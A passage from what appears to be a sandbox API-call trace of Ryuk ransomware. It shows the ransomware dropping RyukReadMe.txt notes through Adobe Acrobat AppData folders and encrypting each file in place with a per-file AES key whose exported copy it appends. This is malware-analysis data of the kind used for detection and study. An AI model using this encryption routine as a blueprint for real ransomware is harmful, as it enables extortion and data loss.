lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0148.495] CloseHandle (hObject=0x198) returned 1 [0148.495] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0148.495] SetLastError (dwErrCode=0x0) [0148.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.495] GetLastError () returned 0xb7 [0148.495] CloseHandle (hObject=0x198) returned 1 [0148.495] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0148.495] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0148.495] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0148.495] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0148.495] SetLastError (dwErrCode=0x0) [0148.496] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\forms\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.496] GetLastError () returned 0x0 [0148.496] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0148.496] CloseHandle (hObject=0x198) returned 1 [0148.497] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0148.497] SetLastError (dwErrCode=0x0) [0148.497] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.497] GetLastError () returned 0xb7 [0148.497] CloseHandle (hObject=0x198) returned 1 [0148.497] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0148.497] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0148.497] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0148.497] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.497] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js", dwFileAttributes=0x80) returned 1 [0148.498] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0148.498] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=0) returned 1 [0148.498] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=0) returned 1 [0148.498] CloseHandle (hObject=0x19c) returned 1 [0148.498] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.498] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0148.498] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.498] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js", dwFileAttributes=0x80) returned 1 [0148.499] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0148.499] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=10) returned 1 [0148.499] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=10) returned 1 [0148.499] CloseHandle (hObject=0x19c) returned 1 [0148.499] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.499] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0148.499] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0148.499] SetLastError (dwErrCode=0x0) [0148.499] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.500] GetLastError () returned 0x0 [0148.500] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0148.501] CloseHandle (hObject=0x198) returned 1 [0148.501] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0148.501] SetLastError (dwErrCode=0x0) [0148.501] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.501] GetLastError () returned 0xb7 [0148.501] CloseHandle (hObject=0x198) returned 1 [0148.501] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0148.501] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0148.501] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0148.501] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.501] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata", dwFileAttributes=0x80) returned 1 [0148.502] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0148.502] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=5399) returned 1 [0148.503] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=5399) returned 1 [0148.503] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x13f5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.503] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0148.504] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.504] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0148.504] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.504] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.504] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1517, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x1517, lpOverlapped=0x0) returned 1 [0148.505] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0148.505] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x1517, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x1520) returned 1 [0148.505] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.505] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x1520, lpOverlapped=0x0) returned 1 [0148.505] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0148.505] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0148.505] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0148.505] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0148.505] CloseHandle (hObject=0x19c) returned 1 [0148.522] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.526] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.526] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.526] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0148.526] SetLastError (dwErrCode=0x0) [0148.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0148.527] GetLastError () returned 0x0 [0148.527] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0148.528] CloseHandle (hObject=0x19c) returned 1 [0148.528] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0148.528] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0148.528] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0148.528] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.528] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", dwFileAttributes=0x80) returned 1 [0148.528] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0148.529] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=933) returned 1 [0148.529] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=933) returned 1 [0148.529] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x283, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.529] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0148.530] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.530] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0148.530] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.530] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.530] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x3a5, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x3a5, lpOverlapped=0x0) returned 1 [0148.530] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0148.530] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x3a5, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x3b0) returned 1 [0148.530] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.531] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x3b0, lpOverlapped=0x0) returned 1 [0148.531] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0148.531] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0148.531] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0148.531] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0148.531] CloseHandle (hObject=0x1a0) returned 1 [0148.548] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.552] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.552] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.552] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0148.552] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.552] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", dwFileAttributes=0x80) returned 1 [0148.552] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0148.553] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=37703) returned 1 [0148.553] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=37703) returned 1 [0148.553] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x9225, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.553] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0148.554] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.554] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0148.554] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.554] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.554] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x9347, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x9347, lpOverlapped=0x0) returned 1 [0148.555] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0148.555] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x9347, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x9350) returned 1 [0148.556] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.556] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x9350, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x9350, lpOverlapped=0x0) returned 1 [0148.556] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0148.556] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0148.556] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0148.556] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0148.556] CloseHandle (hObject=0x1a0) returned 1 [0148.582] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.586] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.586] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.586] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0148.586] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0148.586] SetLastError (dwErrCode=0x0) [0148.586] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0148.588] GetLastError () returned 0x0 [0148.588] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0148.589] CloseHandle (hObject=0x19c) returned 1 [0148.589] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0148.589] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0148.589] SetLastError (dwErrCode=0x0) [0148.589] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.589] GetLastError () returned 0xb7 [0148.589] CloseHandle (hObject=0x198) returned 1 [0148.590] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0148.590] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0148.590] SetLastError (dwErrCode=0x0) [0148.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0148.590] GetLastError () returned 0xb7 [0148.590] CloseHandle (hObject=0x194) returned 1 [0148.590] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0148.590] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0148.590] SetLastError (dwErrCode=0x0) [0148.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\RyukReadMe.txt" (normalized: 